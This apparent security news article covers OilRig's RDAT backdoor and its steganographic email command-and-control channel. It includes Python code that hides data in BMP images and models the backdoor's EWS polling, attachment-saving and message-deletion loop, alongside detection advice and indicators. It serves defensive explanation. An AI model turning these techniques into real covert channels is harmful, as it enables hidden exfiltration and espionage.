A recent string of cyberattacks has targeted a telecommunications company in the Middle East. The group behind the attacks is OilRig, an Iranian advanced persistent threat (APT) actor that combines custom malware with social engineering to exploit both human and software weaknesses.
Palo Alto Networks’ Unit 42 first observed the attacks in April. The attackers used a revised version of a backdoor called RDAT. What stood out during the investigation was RDAT’s novel command-and-control (C2) channel: it hides commands and data inside images attached to emails, a technique called steganography.
OilRig first used this backdoor in 2017, and it has been updated multiple times since then. Timestamps on the samples suggest that the group added steganography to RDAT in 2018.
Unit 42’s report notes that the ability to use Exchange Web Services (EWS) to send and receive emails for C2 communication was added to RDAT in June 2018. This email-based C2 channel relies on steganography to hide both incoming commands and exfiltrated data inside BMP images attached to the emails. Blending the C2 traffic into legitimate Exchange mail flow and burying the payload inside an image attachment makes the channel considerably harder to detect.
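How data can ride inside a bitmap, as an added example that is not code from Unit 42 or from RDAT: the report does not describe RDAT’s exact encoding, so the least-significant-bit scheme, the 24-bit BMP writer and reader, the constructed cover image and the constructed payload below are all assumptions for illustration. The last function is the defender’s side: a pairs-of-values check, the idea behind the classic chi-square attack on sequential LSB embedding, which flags the region whose LSBs were overwritten.

```python
import struct
from collections import Counter


def make_cover(width, height):
    """Constructed cover image: flat blue and green with a red gradient across the
    columns. Samples are BGR triplets in bottom-up rows, as BMP stores them."""
    rows = bytearray()
    for _y in range(height):
        for x in range(width):
            rows += bytes((200, 140, 64 + 3 * x))
    return bytes(rows)


def build_bmp(width, height, pixels):
    """Serialise raw BGR samples into an uncompressed 24-bit BMP (BITMAPINFOHEADER)."""
    if len(pixels) != width * height * 3:
        raise ValueError("pixel buffer does not match the stated dimensions")
    row_size = (width * 3 + 3) & ~3            # each row is padded to a 4-byte boundary
    pad = b"\x00" * (row_size - width * 3)
    body = b"".join(pixels[y * width * 3:(y + 1) * width * 3] + pad for y in range(height))
    file_hdr = struct.pack("<2sIHHI", b"BM", 54 + len(body), 0, 0, 54)
    info_hdr = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, len(body), 2835, 2835, 0, 0)
    return file_hdr + info_hdr + body


def parse_bmp(data):
    """Return (width, height, BGR samples with the row padding stripped)."""
    magic, _size, _r1, _r2, offset = struct.unpack_from("<2sIHHI", data, 0)
    if magic != b"BM":
        raise ValueError("not a BMP file")
    _hdr, width, height, _planes, bpp = struct.unpack_from("<IiiHH", data, 14)
    if bpp != 24:
        raise ValueError("only uncompressed 24-bit BMPs are handled here")
    height = abs(height)                        # a negative height only flips row order
    row_size = (width * 3 + 3) & ~3
    pixels = b"".join(data[offset + y * row_size: offset + y * row_size + width * 3]
                      for y in range(height))
    return width, height, pixels


def embed(pixels, payload):
    """Overwrite the least significant bit of successive samples with a 4-byte
    little-endian length followed by the payload, most significant bit first."""
    msg = struct.pack("<I", len(payload)) + payload
    if len(msg) * 8 > len(pixels):
        raise ValueError("cover image is too small for this payload")
    out = bytearray(pixels)
    for i, byte in enumerate(msg):
        for b in range(8):
            idx = i * 8 + b
            out[idx] = (out[idx] & 0xFE) | ((byte >> (7 - b)) & 1)
    return bytes(out)


def extract(pixels):
    """Inverse of embed(): rebuild bytes from the LSB plane, honouring the length prefix."""
    def read(n_bytes, first_sample):
        out = bytearray()
        for i in range(n_bytes):
            value = 0
            for b in range(8):
                value = (value << 1) | (pixels[first_sample + i * 8 + b] & 1)
            out.append(value)
        return bytes(out)
    (length,) = struct.unpack("<I", read(4, 0))
    if 32 + length * 8 > len(pixels):
        raise ValueError("length prefix exceeds image capacity: no valid payload")
    return read(length, 32)


def pov_imbalance(pixels, n_samples):
    """Defender-side triage: pairs-of-values check over the first n_samples, the idea
    behind the chi-square attack on sequential LSB embedding. Each sample value v is
    paired with v ^ 1; an untouched cover normally uses one member of a pair far more
    than the other (score near 1.0), while a region whose LSBs were replaced by a
    reasonably balanced bit stream levels the pairs out (score well below 0.5)."""
    region = pixels[:n_samples]
    counts = Counter(region)
    imbalance = sum(abs(counts[2 * k] - counts[2 * k + 1]) for k in range(128))
    return imbalance / len(region)


# Constructed stand-in for exfiltrated data: a few lines of host survey output.
PAYLOAD = ("hostname=WS-0042\r\nuser=CORP\\jdoe\r\n" * 6).encode()

if __name__ == "__main__":
    cover = make_cover(63, 32)
    stego = embed(cover, PAYLOAD)
    assert parse_bmp(build_bmp(63, 32, stego))[2] == stego
    assert extract(stego) == PAYLOAD
    span = (4 + len(PAYLOAD)) * 8
    print("cover score:", pov_imbalance(cover, span), "stego score:", pov_imbalance(stego, span))
```

The constructed cover scores exactly 1.0 because every sample value it uses has an unused pair partner; real photographs score lower, but a sequentially embedded region still drops well below the untouched remainder of the same image, which is why the check is run over windows of the sample stream rather than the whole file. Note that the check only works on the span that was actually overwritten; a payload hidden in scattered or encrypted positions needs other statistics.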
Unit 42 also noted that in the telecom campaign OilRig used Mimikatz to steal credentials and escalate privileges, the Bitvise SSH client to create SSH tunnels, and PowerShell downloaders for post-exploitation activity.
According to Unit 42, two of the tools collected had the PDB paths C:\Users\Void\Desktop\dns\client\x64\Release\client.pdb and C:\Users\Void\Desktop\RDAT\client\x64\Release\client.pdb. Pivoting on the user path C:\Users\Void\Desktop in the PDB string, Unit 42 gathered further samples, among which they identified a known OilRig tool called ISMDOOR.
The C2 Channel
RDAT communicates with two hard-coded email addresses, koko@acrlee[.]com and h76y@acrlee[.]com, that are controlled by the threat actors. The emails it sends to these addresses carry bitmap image attachments with the exfiltrated data hidden inside them.
The payload sends its emails from the account of the user logged into the compromised host. The report notes that RDAT uses the WinHTTP library to make its requests to the EWS API, which automatically attempts to log on to Exchange with the logged-on user’s default credentials, so the backdoor needs no stolen mailbox password of its own.
OilRig, in turn, communicates with RDAT by sending emails to the compromised account. RDAT creates an inbox rule that moves incoming C2 messages to the Junk folder, keeping them out of the user’s view, and then looks for hidden commands within the attached bitmap images.
According to the researchers, the payload issues a request to the EWS API to check for unread emails (which the inbox rule has moved to the Junk folder). If any are found, the payload processes the response to the SOAP request and sends additional requests to the EWS API to get the email and its attachment. The attachment content is saved to a file in the %TEMP% folder with a ‘.bmp’ file extension. After that, a SOAP (Simple Object Access Protocol) request is issued to delete the processed email.
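The polling loop described above, modelled offline as an added example that is neither RDAT’s code nor taken from the Unit 42 report: the four EWS SOAP requests are built the way a client would POST them to /EWS/Exchange.asmx, and the server side is replaced by canned responses constructed here, so the sequence FindItem, GetItem, GetAttachment, DeleteItem runs without an Exchange server. The item and attachment identifiers, the attachment name, the HardDelete deletion mode and the output file naming are assumptions; the report only states that the message is deleted and that the content lands in %TEMP% as a .bmp file.

```python
import base64
import os
import re
import tempfile
import xml.etree.ElementTree as ET

S = "http://schemas.xmlsoap.org/soap/envelope/"
T = "http://schemas.microsoft.com/exchange/services/2006/types"
M = "http://schemas.microsoft.com/exchange/services/2006/messages"
NS = {"s": S, "t": T, "m": M}


def envelope(body):
    """Wrap one EWS operation in the SOAP 1.1 envelope that is POSTed to /EWS/Exchange.asmx."""
    return (f'<s:Envelope xmlns:s="{S}" xmlns:t="{T}" xmlns:m="{M}">'
            '<s:Header><t:RequestServerVersion Version="Exchange2013"/></s:Header>'
            f'<s:Body>{body}</s:Body></s:Envelope>')

# Client side: the four requests, in the order the report describes.
def find_unread_in_junk():
    """FindItem restricted to IsRead == false, scoped to the Junk Email folder the inbox rule feeds."""
    return envelope(
        '<m:FindItem Traversal="Shallow"><m:ItemShape><t:BaseShape>IdOnly</t:BaseShape></m:ItemShape>'
        '<m:Restriction><t:IsEqualTo><t:FieldURI FieldURI="message:IsRead"/>'
        '<t:FieldURIOrConstant><t:Constant Value="false"/></t:FieldURIOrConstant></t:IsEqualTo>'
        '</m:Restriction><m:ParentFolderIds><t:DistinguishedFolderId Id="junkemail"/>'
        '</m:ParentFolderIds></m:FindItem>')

def get_item(item_id):
    return envelope('<m:GetItem><m:ItemShape><t:BaseShape>Default</t:BaseShape></m:ItemShape>'
                    f'<m:ItemIds><t:ItemId Id="{item_id}"/></m:ItemIds></m:GetItem>')

def get_attachment(att_id):
    return envelope(f'<m:GetAttachment><m:AttachmentIds><t:AttachmentId Id="{att_id}"/>'
                    '</m:AttachmentIds></m:GetAttachment>')

def delete_item(item_id):
    # HardDelete is an assumption; the report only says the processed message is deleted.
    return envelope(f'<m:DeleteItem DeleteType="HardDelete"><m:ItemIds><t:ItemId Id="{item_id}"/>'
                    '</m:ItemIds></m:DeleteItem>')

# Response parsing, using the namespaces a real Exchange server answers with.
def item_ids(response):
    return [e.get("Id") for e in ET.fromstring(response).iterfind(".//t:ItemId", NS)]

def bmp_attachments(response):
    """(attachment id, name) for every FileAttachment whose name ends in .bmp."""
    found = []
    for att in ET.fromstring(response).iterfind(".//t:FileAttachment", NS):
        name = att.findtext("t:Name", default="", namespaces=NS)
        if name.lower().endswith(".bmp"):
            found.append((att.find("t:AttachmentId", NS).get("Id"), name))
    return found

def attachment_bytes(response):
    node = ET.fromstring(response).find(".//t:FileAttachment/t:Content", NS)
    return base64.b64decode(node.text)

def poll_once(send, out_dir=None):
    """One pass: find unread C2 mail, save each BMP attachment as a .bmp under %TEMP%
    (tempfile.gettempdir() here), then delete the message. The file name is an assumption."""
    out_dir = out_dir or tempfile.gettempdir()
    saved = []
    for item_id in item_ids(send(find_unread_in_junk())):
        for att_id, _name in bmp_attachments(send(get_item(item_id))):
            path = os.path.join(out_dir, re.sub(r"[^A-Za-z0-9]", "_", att_id) + ".bmp")
            with open(path, "wb") as fh:
                fh.write(attachment_bytes(send(get_attachment(att_id))))
            saved.append(path)
        send(delete_item(item_id))
    return saved

# Server side, constructed for this example: one unread message carrying one bitmap.
FAKE_BMP = b"BM" + bytes(58)        # stand-in bytes, not a decodable image
CANNED = {
    "FindItem": envelope(
        '<m:FindItemResponse><m:ResponseMessages><m:FindItemResponseMessage ResponseClass="Success">'
        '<m:ResponseCode>NoError</m:ResponseCode><m:RootFolder TotalItemsInView="1" IncludesLastItemInRange="true">'
        '<t:Items><t:Message><t:ItemId Id="AAMkItem1" ChangeKey="CQAA1"/></t:Message></t:Items>'
        '</m:RootFolder></m:FindItemResponseMessage></m:ResponseMessages></m:FindItemResponse>'),
    "GetItem": envelope(
        '<m:GetItemResponse><m:ResponseMessages><m:GetItemResponseMessage ResponseClass="Success">'
        '<m:ResponseCode>NoError</m:ResponseCode><m:Items><t:Message><t:ItemId Id="AAMkItem1" ChangeKey="CQAA1"/>'
        '<t:Attachments><t:FileAttachment><t:AttachmentId Id="AAMkAtt1"/><t:Name>photo.bmp</t:Name>'
        '</t:FileAttachment></t:Attachments></t:Message></m:Items></m:GetItemResponseMessage>'
        '</m:ResponseMessages></m:GetItemResponse>'),
    "GetAttachment": envelope(
        '<m:GetAttachmentResponse><m:ResponseMessages><m:GetAttachmentResponseMessage ResponseClass="Success">'
        '<m:ResponseCode>NoError</m:ResponseCode><m:Attachments><t:FileAttachment><t:AttachmentId Id="AAMkAtt1"/>'
        f'<t:Name>photo.bmp</t:Name><t:Content>{base64.b64encode(FAKE_BMP).decode()}</t:Content>'
        '</t:FileAttachment></m:Attachments></m:GetAttachmentResponseMessage></m:ResponseMessages>'
        '</m:GetAttachmentResponse>'),
    "DeleteItem": envelope(
        '<m:DeleteItemResponse><m:ResponseMessages><m:DeleteItemResponseMessage ResponseClass="Success">'
        '<m:ResponseCode>NoError</m:ResponseCode></m:DeleteItemResponseMessage></m:ResponseMessages>'
        '</m:DeleteItemResponse>'),
}

def canned_transport(log):
    """Stand-in for the WinHTTP POST: answers from CANNED and records the operation order."""
    def send(request):
        op = ET.fromstring(request).find("s:Body/*", NS).tag.split("}")[1]
        log.append(op)
        return CANNED[op]
    return send

def run_demo():
    """Run one poll against the canned server; returns (operations, file names, file contents)."""
    log = []
    with tempfile.TemporaryDirectory() as tmp:
        saved = poll_once(canned_transport(log), tmp)
        contents = [open(p, "rb").read() for p in saved]
    return log, [os.path.basename(p) for p in saved], contents
```

Seen from the server, this loop leaves a recognisable trace in the EWS logs: a fixed-interval FindItem scoped to the junkemail distinguished folder, followed by GetAttachment and DeleteItem for the same item, from a client whose User-Agent is not Outlook’s. The inbox rule itself would have to be created through EWS’s UpdateInboxRules operation and is visible afterwards with Get-InboxRule, so any mailbox whose EWS traffic looks like this deserves a rule audit.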
The researchers also note that the email C2 channel supplements the HTTP and DNS-tunneling C2 channels observed in other RDAT samples. The backdoor can execute commands, take screenshots, upload files to and download files from the C2, restart processes and delete itself.
The report concludes that a combination of HTTP and DNS-tunneling channels was used in most of the samples obtained. This shows how OilRig continually develops its tradecraft, here with a modified C2 channel that incorporates steganography.
OilRig Continues to be Active
OilRig is believed to be state-sponsored, supported by Iranian intelligence and the Islamic Revolutionary Guard Corps (IRGC). The group appears to be engaged in espionage against financial, aviation, infrastructure, government and university organizations in the Middle East.
The group also goes by Cobalt Gypsy, Crambus, Helix Kitten and APT34, and is known to develop and evolve its tools frequently. It has also been linked to a destructive wiper known as ZeroCleare that was spotted in December.